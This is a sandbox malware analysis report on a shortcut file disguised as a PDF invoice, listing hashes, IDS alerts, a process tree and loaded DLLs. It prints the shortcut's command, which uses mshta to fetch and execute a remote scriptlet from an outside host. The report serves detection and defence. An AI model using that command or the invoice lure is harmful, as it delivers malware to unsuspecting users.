Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE-0098.pdf ... .lnk.lnk.d.lnk

Overview

General Information

Sample name:INVOICE-0098.pdf ... .lnk.lnk.d.lnk
Analysis ID:1578281
MD5:d7d7174b0248c6bc97fc7d9668a514a9
SHA1:a0714a6ecbd2b5b4ca8cf58dd70463d8ae10029d
SHA256:10f0a14d9fb497e9aed942fc9193811b5437bb4dbd606c3db0b69f2273ce601a
Tags:INVOICE-0098lnkuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found potential malicious scriptlet (likely CVE-2017-8570)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • cmd.exe (PID: 1284 cmdline: "C:\Windows\System32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 4220 cmdline: mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close() MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • calc.exe (PID: 4588 cmdline: "C:\Windows\System32\calc.exe" MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
  • Calculator.exe (PID: 7200 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T14:21:27.084485+010020245531A Network Trojan was detected43.250.142.7443192.168.2.949712TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T14:21:27.083953+010020245501A Network Trojan was detected192.168.2.94971243.250.142.7443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T14:21:27.084485+010028199031A Network Trojan was detected43.250.142.7443192.168.2.949712TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T14:21:27.084485+010028266371A Network Trojan was detected43.250.142.7443192.168.2.949712TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: INVOICE-0098.pdf ... .lnk.lnk.d.lnkReversingLabs: Detection: 28%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
Source: INVOICE-0098.pdf ... .lnk.lnk.d.lnkJoe Sandbox ML: detected

Exploits

barindex
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\update[1].sctJump to dropped file
Source: unknownHTTPS traffic detected: 43.250.142.7:443 -> 192.168.2.9:49712 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 2024550 - Severity 1 - ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M1 : 192.168.2.9:49712 -> 43.250.142.7:443
Source: Network trafficSuricata IDS: 2024553 - Severity 1 - ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP AX : 43.250.142.7:443 -> 192.168.2.9:49712
Source: Network trafficSuricata IDS: 2819903 - Severity 1 - ETPRO MALWARE App Whitelist Bypass Via Com Scriptlet Inbound : 43.250.142.7:443 -> 192.168.2.9:49712
Source: Network trafficSuricata IDS: 2826637 - Severity 1 - ETPRO MALWARE Squiblydoo Scriptlet Download : 43.250.142.7:443 -> 192.168.2.9:49712
Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /update.sct HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iblue.teamConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /update.sct HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iblue.teamConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: iblue.team
Source: mshta.exe, 00000003.00000002.1374395683.000001C98467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372500137.000001C984679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372815385.000001C98467D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iblue.team/
Source: mshta.exe, 00000003.00000002.1374309786.000001C9845D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1374167915.000001C984550000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372649384.000001D18719E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1374395683.000001C98465F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1373291501.000001C986005000.00000004.00000800.00020000.00000000.sdmp, INVOICE-0098.pdf ... .lnk.lnk.d.lnkString found in binary or memory: https://iblue.team/update.sct
Source: mshta.exe, 00000003.00000002.1374395683.000001C98467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372500137.000001C984679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372815385.000001C98467D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iblue.team/update.sctmib
Source: mshta.exe, 00000003.00000002.1374715411.000001D187110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 43.250.142.7:443 -> 192.168.2.9:49712 version: TLS 1.2

System Summary

barindex
Source: INVOICE-0098.pdf ... .lnk.lnk.d.lnkLNK file: /c "mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()"
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal84.expl.winLNK@7/3@1/1
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\update[1].sctJump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: INVOICE-0098.pdf ... .lnk.lnk.d.lnkReversingLabs: Detection: 28%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vccorlib140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: concrt140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.datatransfer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rometadata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: propsys.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: fontgroupsoverride.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.energy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.graphics.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: winrttracing.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: directmanipulation.dllJump to behavior
